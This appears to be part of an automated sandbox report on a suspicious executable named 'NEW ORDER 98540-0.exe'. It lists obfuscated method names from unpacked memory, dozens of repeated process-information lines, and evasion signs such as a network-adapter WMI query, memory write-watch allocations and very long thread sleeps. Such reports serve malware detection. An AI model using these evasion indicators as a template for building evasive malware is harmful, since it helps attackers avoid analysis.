                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, uZlOL9TLYmU5CQWggV.csHigh entropy of concatenated method names: 'ucUAp8twtf', 'QxeAMIQtw5', 'xjBASYsGvi', 'x51A1GShLv', 'Vy5AowkZGo', 'm3aAOOruWk', 'fp9iGhwijMs7COukQq', 'Epg9EZB9DDomvBbAil', 'j5JAAib0tc', 'B1SAqHGTh9'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, b8twtfyFxeIQtw5F0G.csHigh entropy of concatenated method names: 'IqbGw6dbgA', 'aGmGLdXeGy', 'YjDGVL1tgE', 'UYcG3XWX4x', 'DbIGuOD2LN', 'X6GGndeUui', 'WZxGxpvxHs', 'i4MGa6FDMs', 'NrmGCPWUqE', 'bJdGblQlCB'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, HCIZegUnFlju9F3i60.csHigh entropy of concatenated method names: 'eOj2Om7JU', 'AF4ItOeY1', 'HyZ8PqOYP', 'XJbjuFcWh', 'PKJJBnMy0', 'fO7XRpwM5', 'ADrPjUZHfL79Dpc7R0', 'xRnsK71ppjC6SNaQlN', 'AZ7hNEwyg', 'tyiRTVHgN'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, NL0FkmAqDomhZHob5QI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KiuRw1kZqD', 'r2ZRLeRPgQ', 'r7WRVxYbRh', 'jdKR3cqNM4', 'WObRu0woYQ', 'oX3RncB1jE', 'gp1RxL6HY0'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, L06p97JjBYsGviP51G.csHigh entropy of concatenated method names: 'CSCvITw9MF', 'f6sv8kt23a', 'wY7vy44eOi', 'P3CvJOhVro', 'pbnvoT0Ehp', 'NyMvOi0VTd', 'VlivtEFTET', 'JhtvhslbC4', 'zmUvEGj4in', 'LxLvRbRQEJ'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.csHigh entropy of concatenated method names: 'G0aqiFIZZe', 'tUGqsPObsv', 'OAiqGtvUAs', 'AI7qvbsc94', 'VvVqr6hZFW', 'Hvhqkq0j5k', 'ew2qprpEkx', 'wIuqMDsKJn', 'FN9qlyq73c', 'kT8qSxbJ7t'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, bfJrT0FFvJIbmSerca.csHigh entropy of concatenated method names: 'gIQDylRnNs', 'oKVDJ5uYmn', 'L6dDBFxDmn', 'dWwD52DTQv', 'uWUD9j0J5H', 'PSrDQnS8vE', 'U5NDe6o9WD', 'TqjDND0371', 'FRsDfR6ecO', 'DvjDWJ5kdu'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, L44r0f5UsYFLUKxgXK.csHigh entropy of concatenated method names: 'IRVsWJ5U97pd92mNq0d', 'nYEDxm5f64SLLjgBvH8', 'gOwkhmKZO2', 'I50kE51Eck', 'LBfkRqqggx', 'W0NFea56ELXIQBSplJQ', 'tPc8Qa5q9cfS0egVXWj', 'OAhntG5vGrrviNNTJsd'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, mhLvAJXlOjXsFxy5wk.csHigh entropy of concatenated method names: 'qkur0a7qN9', 'aDgrjtNofP', 'i07vg9U1Tq', 'NSGv9TNAK9', 'tcLvQB1D02', 'l01vKJiobv', 'x3IveQ4Cl0', 'qmqvNUxg3r', 'HROv4SyTOS', 'hmZvf1X1WM'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, TdcdN7Vi89EF5K6Q2j.csHigh entropy of concatenated method names: 'ToString', 'pSFOWSpF8g', 'gyVO51D53r', 'HZrOgZkoXj', 'vagO9YYAx0', 'RybOQFnDT9', 'CuMOKqFMlR', 'p9jOegIex0', 'O1aONbUOOk', 'uyqO40vL1v'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, e3rC94nD6GJjOouD8Y.csHigh entropy of concatenated method names: 'BW3tayfXBU', 't5YtbVDBdu', 'poqhHln7vZ', 'uC3hAqsoTS', 'IUotWPPAKu', 'RL5tdxSvDZ', 'eRJtFHh1Qn', 'dIdtw38mgV', 'hp4tLxg28D', 'tY1tV73008'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, i9x7YJvmZq74sAn79s.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SWPUCRNnX6', 'FH2UbTkfos', 'cPWUz6Xtvd', 'I5aqH8p3xt', 'gIBqAsyOFR', 'CiYqUQxOhN', 'InvqqSb85R', 'AKyP72LDCR3cyE6qdSq'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, a4TpKUw4fdYmZyjBY2.csHigh entropy of concatenated method names: 'FUBofQ2rmf', 'FslodW4OJJ', 'FOKowdQg2x', 'vWqoLxbPkQ', 'Kpco51RUXN', 'VKHogu3b1T', 'GuBo9LLWsb', 'd19oQVG6mn', 'SlsoKyyrIn', 'TqBoeIZjnq'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, wGo13aBOruWkEkDsnU.csHigh entropy of concatenated method names: 'ssYkivua5o', 'XmWkGCZc7D', 'TRhkr2TSaB', 'sBDkp9gEqC', 'NvpkMxGKEy', 'kKOruriKHG', 'aRDrnOF1hq', 'arqrxu8JhC', 'oRcraQbYKo', 'ITQrCFFkhu'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, MpXysIaBDSPVFB0yTd.csHigh entropy of concatenated method names: 'uHnhsoyUZI', 'sNWhGOtDAL', 'yf1hvJ1GHI', 'fsFhrbvjJW', 'CbDhkAW1fW', 'lrqhpshUKk', 'KnrhMB8uXk', 'GpMhly5Cag', 'M0LhSwfIUw', 'g4Ch1aM2Vo'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, lnblCeeykDavJbFESN.csHigh entropy of concatenated method names: 'vOvpsfILiN', 'Vc5pv3Zqvd', 'gIJpkm9ODd', 'axFkb5yJDU', 'nk0kzVB5X6', 'NX5pHWNtIm', 'o6spAD3ZGG', 'ynWpUdYWD8', 'vGfpq4W3wr', 'fe6pT7nFZP'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, mQGffPbFAA8IEcj98t.csHigh entropy of concatenated method names: 'CHXEATO6Xm', 'zu9EqpHNKU', 'X6SETmy5VD', 'kjIEsiOpsY', 'WKoEGh60eA', 'e8AErrrNci', 'coMEkO0E2L', 'jDAhxYr3UU', 'dbDha5uPHa', 'HjVhC9OtVR'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, HVHn2g3Q4LfsM7dyVK.csHigh entropy of concatenated method names: 'YyatSnHGd2', 'Q7Rt1mjJkl', 'ToString', 'YHJts0veGB', 'KuAtG8m2Au', 'hF5tv5T3WV', 'YYvtrfPCyb', 'DbXtkGOwST', 'kottp3ehFQ', 'ILbtMnS1Ko'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, UYdeq7CoZY7D8MKIGo.csHigh entropy of concatenated method names: 'qXnhBGyte8', 'vFWh5mRYxO', 'QyRhgYcsxx', 'gAIh9M2MVn', 'xOPhwQDFbp', 'X9LhQFxEFG', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, r4D6nA4ylfJKbPA8Hx.csHigh entropy of concatenated method names: 'HM2pPj4KIA', 'QelpmKVSJR', 'CXqp2MpqsM', 'iAOpIllM9Q', 'tCXp0tM9VK', 'ATWp82ITsS', 'v3XpjxjbKv', 'UGXpyP0Btb', 'lK2pJnJ6nv', 'mWUpXUXC0v'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, XLNrvkGXXVcIvSsY94.csHigh entropy of concatenated method names: 'Dispose', 'ewkACqArxA', 'PNdU5ZMoTN', 'Mk8YYQCwrs', 'r4pAbXysIB', 'nSPAzVFB0y', 'ProcessDialogKey', 'dduUHYdeq7', 'oZYUA7D8MK', 'AGoUU1QGff'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, wLIAKIAH7d9yDyNmdO3.csHigh entropy of concatenated method names: 'gviEPnU80e', 'FVjEmOXdk3', 'QYlE2micL1', 'NXlEI49LKM', 'fXSE0r1oc0', 'I82E8sV1oe', 'G1kEjx6WmB', 'E6bEy1vQBI', 'lfvEJ7xQht', 'SrLEXUFQ2C'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, uZlOL9TLYmU5CQWggV.csHigh entropy of concatenated method names: 'ucUAp8twtf', 'QxeAMIQtw5', 'xjBASYsGvi', 'x51A1GShLv', 'Vy5AowkZGo', 'm3aAOOruWk', 'fp9iGhwijMs7COukQq', 'Epg9EZB9DDomvBbAil', 'j5JAAib0tc', 'B1SAqHGTh9'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, b8twtfyFxeIQtw5F0G.csHigh entropy of concatenated method names: 'IqbGw6dbgA', 'aGmGLdXeGy', 'YjDGVL1tgE', 'UYcG3XWX4x', 'DbIGuOD2LN', 'X6GGndeUui', 'WZxGxpvxHs', 'i4MGa6FDMs', 'NrmGCPWUqE', 'bJdGblQlCB'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, HCIZegUnFlju9F3i60.csHigh entropy of concatenated method names: 'eOj2Om7JU', 'AF4ItOeY1', 'HyZ8PqOYP', 'XJbjuFcWh', 'PKJJBnMy0', 'fO7XRpwM5', 'ADrPjUZHfL79Dpc7R0', 'xRnsK71ppjC6SNaQlN', 'AZ7hNEwyg', 'tyiRTVHgN'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, NL0FkmAqDomhZHob5QI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KiuRw1kZqD', 'r2ZRLeRPgQ', 'r7WRVxYbRh', 'jdKR3cqNM4', 'WObRu0woYQ', 'oX3RncB1jE', 'gp1RxL6HY0'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, L06p97JjBYsGviP51G.csHigh entropy of concatenated method names: 'CSCvITw9MF', 'f6sv8kt23a', 'wY7vy44eOi', 'P3CvJOhVro', 'pbnvoT0Ehp', 'NyMvOi0VTd', 'VlivtEFTET', 'JhtvhslbC4', 'zmUvEGj4in', 'LxLvRbRQEJ'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.csHigh entropy of concatenated method names: 'G0aqiFIZZe', 'tUGqsPObsv', 'OAiqGtvUAs', 'AI7qvbsc94', 'VvVqr6hZFW', 'Hvhqkq0j5k', 'ew2qprpEkx', 'wIuqMDsKJn', 'FN9qlyq73c', 'kT8qSxbJ7t'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, bfJrT0FFvJIbmSerca.csHigh entropy of concatenated method names: 'gIQDylRnNs', 'oKVDJ5uYmn', 'L6dDBFxDmn', 'dWwD52DTQv', 'uWUD9j0J5H', 'PSrDQnS8vE', 'U5NDe6o9WD', 'TqjDND0371', 'FRsDfR6ecO', 'DvjDWJ5kdu'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, L44r0f5UsYFLUKxgXK.csHigh entropy of concatenated method names: 'IRVsWJ5U97pd92mNq0d', 'nYEDxm5f64SLLjgBvH8', 'gOwkhmKZO2', 'I50kE51Eck', 'LBfkRqqggx', 'W0NFea56ELXIQBSplJQ', 'tPc8Qa5q9cfS0egVXWj', 'OAhntG5vGrrviNNTJsd'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, mhLvAJXlOjXsFxy5wk.csHigh entropy of concatenated method names: 'qkur0a7qN9', 'aDgrjtNofP', 'i07vg9U1Tq', 'NSGv9TNAK9', 'tcLvQB1D02', 'l01vKJiobv', 'x3IveQ4Cl0', 'qmqvNUxg3r', 'HROv4SyTOS', 'hmZvf1X1WM'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, TdcdN7Vi89EF5K6Q2j.csHigh entropy of concatenated method names: 'ToString', 'pSFOWSpF8g', 'gyVO51D53r', 'HZrOgZkoXj', 'vagO9YYAx0', 'RybOQFnDT9', 'CuMOKqFMlR', 'p9jOegIex0', 'O1aONbUOOk', 'uyqO40vL1v'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, e3rC94nD6GJjOouD8Y.csHigh entropy of concatenated method names: 'BW3tayfXBU', 't5YtbVDBdu', 'poqhHln7vZ', 'uC3hAqsoTS', 'IUotWPPAKu', 'RL5tdxSvDZ', 'eRJtFHh1Qn', 'dIdtw38mgV', 'hp4tLxg28D', 'tY1tV73008'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, i9x7YJvmZq74sAn79s.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SWPUCRNnX6', 'FH2UbTkfos', 'cPWUz6Xtvd', 'I5aqH8p3xt', 'gIBqAsyOFR', 'CiYqUQxOhN', 'InvqqSb85R', 'AKyP72LDCR3cyE6qdSq'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, a4TpKUw4fdYmZyjBY2.csHigh entropy of concatenated method names: 'FUBofQ2rmf', 'FslodW4OJJ', 'FOKowdQg2x', 'vWqoLxbPkQ', 'Kpco51RUXN', 'VKHogu3b1T', 'GuBo9LLWsb', 'd19oQVG6mn', 'SlsoKyyrIn', 'TqBoeIZjnq'
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, wGo13aBOruWkEkDsnU.csHigh entropy of concatenated method names: 'ssYkivua5o', 'XmWkGCZc7D', 'TRhkr2TSaB', 'sBDkp9gEqC', 'NvpkMxGKEy', 'kKOruriKHG', 'aRDrnOF1hq', 'arqrxu8JhC', 'oRcraQbYKo', 'ITQrCFFkhu'
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER 98540-0.exe PID: 6028, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 7960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 8A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 9A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMemory allocated: 51F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWindow / User API: threadDelayed 646Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWindow / User API: threadDelayed 3136Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 4596Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 5796Thread sleep count: 646 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99884s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 5796Thread sleep count: 3136 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99563s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -99063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe TID: 1976Thread sleep time: -98250s >= -30000sJump to behavior
